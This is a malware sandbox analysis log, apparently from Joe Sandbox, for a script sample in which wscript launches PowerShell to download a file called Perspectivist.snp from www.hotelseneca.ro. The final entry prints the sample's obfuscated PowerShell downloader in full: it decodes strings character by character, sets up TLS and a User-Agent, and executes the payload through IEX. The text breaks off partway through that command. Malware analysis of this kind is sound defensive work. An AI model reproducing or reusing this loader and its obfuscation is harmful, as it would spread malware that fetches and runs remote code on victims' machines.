Source: Submitted Sample |
Integrated Neural Analysis Model: Matched 95.6% probability |
Source: unknown |
HTTPS traffic detected: 185.181.240.15:443 -> 192.168.2.7:49700 version: TLS 1.2 |
Source: |
Binary string: *on.pdb source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: tem.Core.pdbz' source: powershell.exe, 0000000D.00000002.2539499175.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: tomation.pdbGk source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e |
Source: Joe Sandbox View |
JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e |
Source: global traffic |
HTTP traffic detected: GET /Perspectivist.snp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.hotelseneca.roConnection: Keep-Alive |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /Perspectivist.snp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.hotelseneca.roConnection: Keep-Alive |
Source: global traffic |
DNS traffic detected: DNS query: Horm5zl_6637.6637.6637.657e |
Source: global traffic |
DNS traffic detected: DNS query: www.hotelseneca.ro |
Source: powershell.exe, 0000000D.00000002.2569380323.0000000007444000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro# |
Source: powershell.exe, 0000000D.00000002.2569380323.00000000073D0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsoftP |
Source: powershell.exe, 00000004.00000002.1391887473.0000016765994000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://hotelseneca.ro |
Source: powershell.exe, 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000004.00000002.1391887473.00000167638A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2543840351.00000000049F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000004.00000002.1391887473.0000016765994000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.hotelseneca.ro |
Source: powershell.exe, 00000004.00000002.1391887473.00000167638A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000D.00000002.2543840351.00000000049F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000004.00000002.1391887473.000001676463C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000004.00000002.1391887473.00000167658E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1391887473.0000016763AC7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.hotelseneca.ro |
Source: powershell.exe, 00000004.00000002.1391887473.0000016763AC7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.hotelseneca.ro/Perspectivist.snpP |
Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.hotelseneca.ro/Perspectivist.snpXR |
Source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.hotelseneca.ro/Perspectivist.snpmuim |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49700 -> 443 |
Source: unknown |
HTTPS traffic detected: 185.181.240.15:443 -> 192.168.2.7:49700 version: TLS 1.2 |
Source: amsi64_7400.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_8108.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 8108, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. 
xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOF |